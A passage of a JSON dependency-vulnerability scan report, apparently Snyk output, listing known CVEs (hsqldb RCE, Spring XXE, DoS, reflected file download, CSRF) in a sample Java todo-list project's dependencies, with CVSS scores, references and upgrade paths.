"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "credit": [ - "OSS Fuzz Team" - ], - "semver": { - "vulnerable": [ - "[,2.7.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.7.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.hsqldb:hsqldb", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", - "title": "Chromium Bugs" - }, - { - "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", - "title": "GitHub Commit" - }, - { - "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", - "title": "Mitigation" - }, - { - "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", - "title": "SVN Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:55.045961Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:53.988304Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:59.414572Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", - "epssDetails": { - "percentile": "0.85801", - "probability": "0.01274", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-41853" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-77xx-rxvh-q682" - ] - }, - "packageName": "org.hsqldb:hsqldb", - "proprietary": false, - "creationTime": "2022-10-07T07:26:42.276748Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-06T18:52:05Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.hsqldb", - "artifactId": "hsqldb" - }, - "publicationTime": "2022-10-07T07:26:42.515068Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.414572Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hsqldb:hsqldb@2.3.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hsqldb:hsqldb", - "version": "2.3.2" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832", - "title": "Improper Input Validation", - "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.2.0.RELEASE,4.3.29.RELEASE)", - "[5.0.0.RELEASE, 5.0.19.RELEASE)", - "[5.1.0.RELEASE, 5.1.18.RELEASE)", - "[5.2.0.RELEASE, 5.2.9.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "4.3.29.RELEASE", - "5.0.19.RELEASE", - "5.1.18.RELEASE", - "5.2.9.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.6, - "functions": [ - { - "version": [ - "[3.2.0.RELEASE,4.3.29.RELEASE)", - "[5.0.0.RELEASE, 5.0.19.RELEASE)", - "[5.1.0.RELEASE, 5.1.18.RELEASE)", - "[5.2.0.RELEASE, 5.2.9.RELEASE)" - ], - "functionId": { - "filePath": "org/springframework/web/util/WebUtils.java", - "className": "WebUtils", - "functionName": "parseMatrixVariables" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-web", - "references": [ - { - "url": "https://tanzu.vmware.com/security/cve-2015-5211", - "title": "CVE-2015-5211" - }, - { - "url": "https://pivotal.io/security/cve-2020-5421", - "title": "Pivotal Security Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:48:33.950462Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", - "cvssV3BaseScore": 6.5, - "modificationTime": "2024-03-11T09:51:07.572789Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:04.397840Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:33.950462Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:07.572789Z" - } - ], - "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Improper Input Validation. The protections against Reflected File Download attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a `jsessionid` path parameter.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 4.3.29.RELEASE, 5.0.19.RELEASE, 5.1.18.RELEASE, 5.2.9.RELEASE or higher.\n## References\n- [CVE-2015-5211](https://tanzu.vmware.com/security/cve-2015-5211)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2020-5421)\n", - "epssDetails": { - "percentile": "0.95901", - "probability": "0.15300", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-5421" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.springframework:spring-web", - "proprietary": false, - "creationTime": "2020-09-18T14:36:44.859594Z", - "functions_new": [ - { - "version": [ - "[3.2.0.RELEASE,4.3.29.RELEASE)", - "[5.0.0.RELEASE, 5.0.19.RELEASE)", - "[5.1.0.RELEASE, 5.1.18.RELEASE)", - "[5.2.0.RELEASE, 5.2.9.RELEASE)" - ], - "functionId": { - "className": "org.springframework.web.util.WebUtils", - "functionName": "parseMatrixVariables" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-09-18T14:23:55Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-web" - }, - "publicationTime": "2020-09-18T16:17:53Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:07.572789Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@4.3.29.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-web", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30163", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0.0.RELEASE,3.2.9.RELEASE)", - "[4.0.0.RELEASE,4.0.5.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.2.9.RELEASE", - "4.0.5.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.8, - "functions": [ - { - "version": [ - "[3,3.2.8.RELEASE]", - "[4,4.0.4.RELEASE]" - ], - "functionId": { - "filePath": "org/springframework/http/converter/xml/SourceHttpMessageConverter.java", - "className": "SourceHttpMessageConverter", - "functionName": "readDOMSource" - } - }, - { - "version": [ - "[3,3.2.8.RELEASE]", - "[4,4.0.4.RELEASE]" - ], - "functionId": { - "filePath": "org/springframework/http/converter/xml/SourceHttpMessageConverter.java", - "className": "SourceHttpMessageConverter", - "functionName": "readSAXSource" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-web", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/8e096aeef55287dc829484996c9330cf755891a1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/c6503ebbf7c9e21ff022c58706dbac5417b2b5eb", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/16390", - "title": "GitHub Issue" - }, - { - "url": "http://www.gopivotal.com/security/cve-2014-0225", - "title": "Pivotal Security" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0225", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:48:48.781285Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:33.267561Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:48.781285Z" - } - ], - "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. This is due to not disabling the resolution of URI references by default in a DTD declaration. This occurs only when processing user provided XML documents.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `org.springframework:spring-web` to version 3.2.9.RELEASE, 4.0.5.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/8e096aeef55287dc829484996c9330cf755891a1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/c6503ebbf7c9e21ff022c58706dbac5417b2b5eb)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/16390)\n- [Pivotal Security](http://www.gopivotal.com/security/cve-2014-0225)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0225)\n", - "epssDetails": { - "percentile": "0.55630", - "probability": "0.00181", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-0225" - ], - "CWE": [ - "CWE-611" - ] - }, - "packageName": "org.springframework:spring-web", - "proprietary": false, - "creationTime": "2016-12-25T16:51:52Z", - "functions_new": [ - { - "version": [ - "[3,3.2.8.RELEASE]", - "[4,4.0.4.RELEASE]" - ], - "functionId": { - "className": "org.springframework.http.converter.xml.SourceHttpMessageConverter", - "functionName": "readDOMSource" - } - }, - { - "version": [ - "[3,3.2.8.RELEASE]", - "[4,4.0.4.RELEASE]" - ], - "functionId": { - "className": "org.springframework.http.converter.xml.SourceHttpMessageConverter", - "functionName": "readSAXSource" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2016-12-25T16:51:52Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-web" - }, - "publicationTime": "2016-12-25T16:51:52Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:48.781285Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@3.2.9.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-web", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30164", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", - "credit": [ - "Toshiaki Maki" - ], - "semver": { - "vulnerable": [ - "[3.2.0.RELEASE, 3.2.14.RELEASE)", - "[4.0.0.RELEASE, 4.1.7.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.2.14.RELEASE", - "4.1.7.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-web", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/5a711c05ec750f069235597173084c2ee796242", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/17727", - "title": "GitHub Issue" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3192", - "title": "NVD" - }, - { - "url": "http://pivotal.io/security/cve-2015-3192", - "title": "Pivotal Security" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.5, - "modificationTime": "2024-03-11T09:46:06.799603Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:18.827537Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:06.799603Z" - } - ], - "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). It does not properly process inline DTD declarations when DTD is not entirely disabled, which allows remote attackers to cause a denial of service (memory consumption and out-of-memory errors) via a crafted XML file.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-web` to version 3.2.14.RELEASE, 4.1.7.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/5a711c05ec750f069235597173084c2ee796242)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/17727)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3192)\n- [Pivotal Security](http://pivotal.io/security/cve-2015-3192)\n", - "epssDetails": { - "percentile": "0.91000", - "probability": "0.03030", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-3192" - ], - "CWE": [ - "CWE-119" - ] - }, - "packageName": "org.springframework:spring-web", - "proprietary": false, - "creationTime": "2016-12-25T16:51:55Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-10-16T05:57:41Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-web" - }, - "publicationTime": "2016-12-25T16:51:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:06.799603Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@3.2.14.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-web", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30165", - "title": "Reflected File Download", - "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", - "credit": [ - "Alvaro Muñoz" - ], - "semver": { - "vulnerable": [ - "[3.2.0.RELEASE, 3.2.15.RELEASE)", - "[4.0.0.RELEASE, 4.1.8.RELEASE)", - "[4.2.0.RELEASE, 4.2.2.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.2.15.RELEASE", - "4.1.8.RELEASE", - "4.2.2.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.6, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-web", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/03f547eb9868f48f44d59b56067d4ac4740672c3", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/2bd1daa75ee0b8ec33608ca6ab065ef3e1815543", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/a95c3d820dbc4c3ae752f1b3ee22ee860b162402", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/18124", - "title": "GitHub Issue" - }, - { - "url": "https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/", - "title": "Oren Hafif Blog" - }, - { - "url": "http://pivotal.io/security/cve-2015-5211", - "title": "Pivotal Security" - }, - { - "url": "https://access.redhat.com/security/cve/cve-2015-5211", - "title": "RedHat CVE Database" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 9.6, - "modificationTime": "2024-03-11T09:48:48.763614Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:03.857756Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:48.763614Z" - } - ], - "description": "## Overview\n\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\n\nAffected versions of this package are vulnerable to Reflected File Download\nvia a crafted URL with a batch script extension, resulting in the response being downloaded rather than rendered.\n\n## Remediation\n\nUpgrade `org.springframework:spring-web` to version 3.2.15.RELEASE, 4.1.8.RELEASE, 4.2.2.RELEASE or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/03f547eb9868f48f44d59b56067d4ac4740672c3)\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/2bd1daa75ee0b8ec33608ca6ab065ef3e1815543)\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/a95c3d820dbc4c3ae752f1b3ee22ee860b162402)\n\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/18124)\n\n- [Oren Hafif Blog](https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/)\n\n- [Pivotal Security](http://pivotal.io/security/cve-2015-5211)\n\n- [RedHat CVE Database](https://access.redhat.com/security/cve/cve-2015-5211)\n", - "epssDetails": { - "percentile": "0.68512", - "probability": "0.00278", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-5211" - ], - "CWE": [ - "CWE-494" - ] - }, - "packageName": "org.springframework:spring-web", - "proprietary": false, - "creationTime": "2016-12-25T16:51:56Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-10-15T16:51:56Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-web" - }, - "publicationTime": "2016-12-25T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:48.763614Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-web@3.2.15.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-web", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31331", - "title": "Cross-site Request Forgery (CSRF)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", - "credit": [ - "Spase Markovski" - ], - "semver": { - "vulnerable": [ - "[3.0.0.RELEASE,3.2.8.RELEASE)", - "[4.0.0.RELEASE,4.0.2.RELEASE)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.2.8.RELEASE", - "4.0.2.RELEASE" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-web", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/edba32b3093703d5e9ed42b5b8ec23ecc1998398%23diff-1f3f1d5cdab9ac92d1ca5ec7def8f131", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/commit/fb0683c066e74e9667d6cd8c5fa01f674c68c3be%23diff-1f3f1d5cdab9ac92d1ca5ec7def8f131", - "title": "GitHub Commit" - }, - { - "url": "https://jira.spring.io/browse/SPR-11376", - "title": "Jira Issue" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0054", - "title": "NVD" - }, - { - "url": "http://www.pivotal.io/security/cve-2014-0054", - "title": "Pivotal Security" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 6.3, - "modificationTime": "2024-03-11T09:45:48.737689Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:09.210753Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:45:48.737689Z" - } - ], - "description": "## Overview\r\n[`org.springframework:spring-web`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-web%22)\r\nAffected versions of this package do not disable external entity resolution, which allows remote attackers to read arbitrary files, cause a denial of service and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue. \r\n\r\n**NOTE:** this vulnerability exists because of an incomplete fix for [CVE-2013-4152](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-31330), [CVE-2013-7315](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30162), and [CVE-2013-6429](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30160).\r\n\r\n## References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0054)", - "epssDetails": { - "percentile": "0.96745", - "probability": "0.25530", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2014-0054" - ], - "CWE": [ - "CWE-352" - ] - }, - "packageName": "org.springframework:spring-web", - "proprietary": false, - "creationTime": "2017-02-22T07:28:31.538000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2014-04-17T14:55:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-web" - }, - "publicationTime": "2014-06-06T21:43:43Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:45:48.737689Z", - 